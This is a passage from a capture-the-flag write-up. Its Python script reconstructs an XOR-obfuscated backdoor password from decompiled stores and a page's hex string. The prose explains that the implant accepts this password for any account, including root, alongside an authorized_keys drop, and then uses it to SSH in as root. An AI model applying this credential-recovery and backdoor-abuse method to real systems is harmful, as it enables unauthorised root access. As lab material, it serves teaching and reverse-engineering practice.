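# Stores exactly as the decompiler printed them for the 31-byte buffer:
# (byte offset, width in bytes, value). Values are little-endian integers,
# so the low byte of each one lands at the lowest address.
FIELD_STORES = [
    (0, 4, 0xF0E7ABD6), (4, 4, 0xA4B3A3F3), (8, 4, 0xF7BBFDC8), (12, 4, 0xFDB3D6E7),
    (16, 8, 0xB2D6F4A0FDA0B3D6), (24, 4, 0xBCF0B5E3), (28, 2, 0xA9F4),
    (30, 1, 0xA5),  # shown by Ghidra as the signed byte -0x5b
]
XOR_KEY = 0x96                              # the constant in `*pbVar4 = bVar7 ^ 0x96`
PACK_FORMAT = {1: "<B", 2: "<H", 4: "<I", 8: "<Q"}

# Hand-reversed hex string from the page's script, kept only for cross-checking.
PAGE_HEX = "a5a9f4bcf0b5e3b2d6f4a0fda0b3d6fdb3d6e7f7bbfdc8a4b3a3f3f0e7abd6"


def assemble_buffer(stores, size=31):
    """Lay the decompiler's stores into a byte buffer in memory order."""
    buf = bytearray(size)
    for offset, width, value in stores:
        buf[offset:offset + width] = struct.pack(PACK_FORMAT[width], value)
    return bytes(buf)


def decode_backdoor(buf, key=XOR_KEY):
    """Mirror the decompiled loop: every byte is XORed in place with the key."""
    return bytes(b ^ key for b in buf).decode("ascii")


def decode_from_page_hex(hex_str):
    """The page's method: unhexlify the hand-copied string, reverse, XOR."""
    return decode_backdoor(bytes.fromhex(hex_str)[::-1])


def recovered_credential():
    """Return the credential only if both reconstructions agree."""
    from_fields = decode_backdoor(assemble_buffer(FIELD_STORES))
    from_hex = decode_from_page_hex(PAGE_HEX)
    if from_fields != from_hex:
        raise ValueError("field assembly and hand-copied hex disagree; re-check a store")
    return from_fields


if __name__ == "__main__":
    print("backdoor password:", recovered_credential())
```

Because `strcmp` stops at the first NUL, the comparison succeeds for any user whose supplied password equals the 31 decoded characters, regardless of the account's real password; the same hard-coded value would also be accepted for root, which is why the implant pairs it with the authorized_keys drop for redundancy.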

After recovering the root password with this script, one can SSH into the server as root and grab the system flag.

Such a nice box. Happy Hacking!!!

Kiran Dawadi

Founder of cybersecnerds.com. Electronics Engineer by profession, Security Engineer by passion. I am a Linux Enthusiast and highly interested in the offensive side of the CyberSec industry. You will find me reading InfoSec blogs most of the time.
